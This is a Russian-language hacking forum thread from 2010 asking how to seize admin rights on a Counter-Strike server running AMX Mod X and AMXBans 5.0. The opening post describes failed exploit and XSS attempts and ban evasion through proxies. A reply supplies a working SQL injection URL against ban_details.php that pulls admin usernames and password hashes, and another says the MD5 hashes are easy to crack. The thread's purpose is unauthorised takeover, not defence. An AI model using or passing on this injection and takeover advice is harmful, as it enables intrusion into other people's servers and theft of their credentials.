Приветствую.. как я понимаю решений нету пока , как урулить админку?
meta list говорить...
Цитата:
Currently running plugins:
[ 1] AMX Mod X, v1.8.1.3746, Aug 16 2008, by AMX Mod X Dev Team, see [Ссылки могут видеть только зарегистрированные пользователи. ]
[ 2] dproto, v0.4.1, 2010/01/28, by Crock, see
[ 3] Fun, v1.8.1.3746, Aug 16 2008, by AMX Mod X Dev Team, see [Ссылки могут видеть только зарегистрированные пользователи. ]
[ 4] CStrike, v1.8.1.3746, Aug 16 2008, by AMX Mod X Dev Team, see [Ссылки могут видеть только зарегистрированные пользователи. ]
[ 5] CSX, v1.8.1.3746, Aug 16 2008, by AMX Mod X Dev Team, see [Ссылки могут видеть только зарегистрированные пользователи. ]
[ 6] MySQL, v1.8.1.3746, Aug 16 2008, by AMX Mod X Dev Team, see [Ссылки могут видеть только зарегистрированные пользователи. ]
[ 7] Ham Sandwich, v1.8.1.3746, Aug 16 2008, by AMX Mod X Dev Team, see [Ссылки могут видеть только зарегистрированные пользователи. ]
7 plugins
Exploit создания пользователя в amxbans не валит. XSS тоже тупят что то.. либо я не разобрался.. есть варианты создания пользователя? либо тупо не разобрался..
Есть предложения?
Обходить бананы труъ глючными соксами.. как то не то..
P.S. та.. мну нех делать
Вариант молотка не катит
Сплоитов на amxbans с повышением привилегий не нашел..
Ронять "тупо" сервер глупо
Последний раз редактировалось CJIunoH; 14.03.2010 в 18:25.
Re: Угон Админки 1.8.1 / Amxbans 5.0. А возможно ли?
вот дописав это в адресной строке ban_details.php?bid=-1+union+select+1,username,password,4,5,6+from+amx_ webadmins--
можно узнать логин и пароль,правдо зашифрованый пасс в md5.Щас правдо это уже усторело к сожилению.
Re: Угон Админки 1.8.1 / Amxbans 5.0. А возможно ли?
Цитата:
Сообщение от PaFo
вот дописав это в адресной строке ban_details.php?bid=-1+union+select+1,username,password,4,5,6+from+amx_ webadmins--
можно узнать логин и пароль,правдо зашифрованый пасс в md5.Щас правдо это уже усторело к сожилению.
Да там мд5 раскодировать по быстрому можно...
________________
[Ссылки могут видеть только зарегистрированные пользователи. ]